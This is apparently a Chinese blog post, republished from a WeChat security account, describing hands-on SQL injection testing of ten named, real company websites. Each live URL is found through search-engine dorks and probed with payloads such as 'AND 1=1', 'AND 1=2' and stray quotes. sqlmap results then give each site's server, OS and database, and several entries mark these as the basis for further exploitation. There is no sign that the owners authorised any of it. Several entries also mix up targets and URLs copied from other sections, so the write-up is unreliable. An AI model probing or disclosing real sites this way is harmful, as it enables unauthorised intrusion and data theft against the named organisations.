记一次实战案例

admin 2024年5月14日22:26:25评论5 views字数 5066阅读16分53秒阅读模式

1、目标:inurl:news.php?id=  

URL:https://www.lghk.com/news.php?id=5

网站标题:趋时珠宝首饰有限公司

手工基础判断:

And用法

and 1=1: 这个条件始终是为真的, 也就是说, 存在SQL注入的话, 这个and 1=1的返回结果必定是和正常页面时是完全一致的

and 1=2返回为假, 会强行吧整个查询条件建立成假. 导致查询无数据, 因此页面内容会和正常页面不同.

原始网页:https://www.lghk.com/news.php?id=5

构造url1:https://www.lghk.com/news.php?id=5 AND 1=1

         记一次实战案例

构造url2https://www.lghk.com/news.php?id=5 AND 1=2

记一次实战案例

如果url1访问结果跟原始网页一致,而url2跟原始网页不一致,有出错信息或者显示内容不一致,则证明存在SQL注入。

or用法:只要有一个为真,那么整条语句都是真

构造url1https://www.lghk.com/news.php?id=5or 1=1正常页面只有News(会显示News, Awards & Cert.

构造url2https://www.lghk.com/news.php?id=5or 1=2正常页面只有News(会显示News, Awards & Cert.

记一次实战案例

xor用法:同为真同为假,那就是假;一真一假才为真

构造url1https://www.lghk.com/news.php?id=5xor 1=1(显示正常,全部数据都给)

构造url2https://www.lghk.com/news.php?id=5xor 1=2(显示正常,全部数据都给)

字符串类型判断

单引号

构造url1https://www.lghk.com/news.php?id=5(输入单引号会显示报错,后端代码可能有问题 )

记一次实战案例

双引号

构造url1https://www.lghk.com/news.php?id=”5”(显示页面正常 )

记一次实战案例

Sqlmap检测:使用工具来跑可以看到存在多种注入,可以看到这个网站的应用信息,web应用技术:Nginx,PHP 7.4.33

后端DBMS:MySQL>=5.0(MariaDB fork)

记一次实战案例

2、目标:inurl:news.php?id=  

URL:http://www.xiatech.com.cn/aboutus.asp?id=3

网站标题:西安夏溪科技

手工基础判断:

And用法

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 AND+1=1 (显示空白页面这通常表示可能存在 SQL 注入漏洞

记一次实战案例

构造url2:http://www.xiatech.com.cn/aboutus.asp?id=3 AND+1=2 (显示报错页面这通常表示可能存在 SQL 注入漏洞

记一次实战案例

or用法

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=1 (显示1的页面,页面页发生了变化)

字符串类型判断

单引号

构造url1https://www.lghk.com/news.php?id=5(输入单引号会显示报错,后端代码可能有问题 )

记一次实战案例

构造url2:http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=2 (页面没发生变化)

记一次实战案例

xor用法

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 xor+1=1 (显示1的页面,页面页发生了变化)

记一次实战案例

构造url2:http://www.xiatech.com.cn/aboutus.asp?id=3 xor+1=2 (页面没发生了变化)

记一次实战案例

字符串类型判断

单引号

构造url1http://www.xiatech.com.cn/aboutus.asp?id=3’(输入单引号会显示报错,后端代码可能有问题 )

记一次实战案例双引号

构造url1http://www.xiatech.com.cn/aboutus.asp?”id=”5”(显示错误 )

记一次实战案例

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

操作系统Windows7 or2008r2

中间件是 iis 7.5

(知道这些信息我们可以查找历史漏洞进行下一步操作)

记一次实战案例

记一次实战案例

3、目标:inurl:news.php?id=  

URL:http://www.xiatech.com.cn/aboutus.asp?id=3

网站标题:西安夏溪科技

手工基础判断:

And用法

构造url1:http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=1 (显示空白页面这通常表示可能存在 SQL 注入漏洞

构造url2:http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=2(报错页面)

记一次实战案例

or用法

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=1or 1+=2(页面显示正常)

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

操作系统Windows7 2012 r2or 8.1

中间件是 PHP 5.4.45, Microsoft IIS 8.5

数据库是MySQL5.0

(知道这些信息我们可以查找历史漏洞进行下一步操作)

记一次实战案例

4、目标:inurl:asp?id=  

URL:http://www.jgbr.com.cn/ShowProduct.asp?ID=217

网站标题:江苏力星通用钢球股份有限公司

手工基础判断:

And用法

构造url1:http://www.jgbr.com.cn/ShowProduct.asp?ID=217 AND+1=1 (显示空白页面这通常表示可能存在 SQL 注入漏洞

构造url2:http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=2(报错页面)

记一次实战案例

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

操作系统Windows7 or2008r2

中间件是 iis 7.5

(知道这些信息我们可以查找历史漏洞进行下一步操作)

记一次实战案例

5、目标:inurl:asp?id=  

URL:http://www.hosen.cn/product.php?pid=500

网站标题:南京浩晃科技有限公司

手工基础判断:

And用法

构造url1:http://www.hosen.cn/product.php?pid=500 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞

记一次实战案例

构造url2:http://www.hosen.cn/product.php?pid=500 AND+1=2 (报错页面可能存在 SQL 注入漏洞

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

网站信息:PHP 5.4.26, Nginx

(知道这些信息我们可以查找历史漏洞进行下一步操作)

记一次实战案例

6、目标:inurl:asp?id=  

URL:http://www.cuc-china.net/about.asp?id=124

网站标题:世优认证 (上海)有限公司

手工基础判断:

And用法

构造url1:http://www.cuc-china.net/about.asp?id=124 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞

记一次实战案例

构造url2:http://www.cuc-china.net/about.asp?id=124 AND+1=2(报错页面可能存在 SQL 注入漏洞

记一次实战案例

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

web服务器操作系统:Windows 7或2008 R2

web应用技术:Microsoft IIS 7.5、ASP、ASP。NET

后端DBMS:Microsoft Access (知道这些信息我们可以查找历史漏洞进行下一步操作)

记一次实战案例

7、目标:inurl:asp?id=  

URL:http://www.ywbaili.com/news.php?id=1

网站标题:百利飞镖

手工基础判断:

And用法

构造url1:http://www.ywbaili.com/news.php?id=1 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞

记一次实战案例

构造url2:http://www.ywbaili.com/news.php?id=1 AND+1=2 (显示正常页面这通常表示可能存在 SQL 注入漏洞

记一次实战案例

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

web服务器操作系统:Windows XP或2003

web应用技术:ASP.NET、Microsoft IIS 6.0

后端DBMS:MySQL>=5.0.12(知道这些信息我们可以查找历史漏洞进行下一步操作)

记一次实战案例

8、目标:inurl:news.php?id=  

URL:https://www.szdwwy.com/service_show.php?id=2

网站标题:东吴服务产业集团 (江苏) 有限公司

And用法

构造url1:https://www.szdwwy.com/service_show.php?id=2 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞

构造url2:http://www.ywbaili.com/news.php?id=1 AND+1=2 (显示正常页面这通常表示可能存在 SQL 注入漏洞

记一次实战案例

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

后端DBMS是MySQL

web应用程序技术:Apache

后端DBMS:MySQL>=5.0.12

(知道这些信息我们可以查找历史漏洞进行下一步操作)

记一次实战案例

9、目标:inurl:news.php?id=  

URL:http://www.icet.org.cn/news.asp?id=367

网站标题:能源与交通创新中心

And用法

构造url1:http://www.icet.org.cn/news.asp?id=367 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞

构造url2:http://www.icet.org.cn/news.asp?id=367 AND+1=2 (显示正常页面这通常表示可能存在 SQL 注入漏洞

记一次实战案例

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

web服务器操作系统:Windows 2012或8

web应用程序技术:Microsoft IIS 8.0、ASP.NET、ASP

后端DBMS:Microsoft Access

(知道这些信息我们可以查找历史漏洞进行下一步操作)

记一次实战案例

10、目标:inurl:band_info.php?id=  

URL:http://www.fine-stamping.com/contact.asp?id=10

网站标题:苏州范斯特机械科技有限公司

And用法

构造url1:http://www.fine-stamping.com/contact.asp?id=10 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞

构造url2:http://www.fine-stamping.com/contact.asp?id=10 AND+1=2(显示正常页面这通常表示可能存在 SQL 注入漏洞

字节符

构造url2:http://www.fine-stamping.com/contact.asp?id=10’(显示报错)

记一次实战案例

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

web服务器操作系统:Windows

web应用技术:ASP

后端DBMS:Microsoft Access

(知道这些信息我们可以查找历史漏洞进行下一步操作)

记一次实战案例

问题:1  

URL:http://www.syyqz.com/lianxi.php?pid=6&id=6

手工测试是有漏洞,但是使用sqlmap跑也是有注入点,但是就是跑不出数据库信息

记一次实战案例

问题:2  

URL:http://www.isriht.com/index.php?id=344

输入了and 1=1 显示下图这样的操作

记一次实战案例

原文始发于微信公众号(CSJH网络安全团队):记一次实战案例

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月14日22:26:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次实战案例http://cn-sec.com/archives/2065151.html

发表评论

匿名网友 填写信息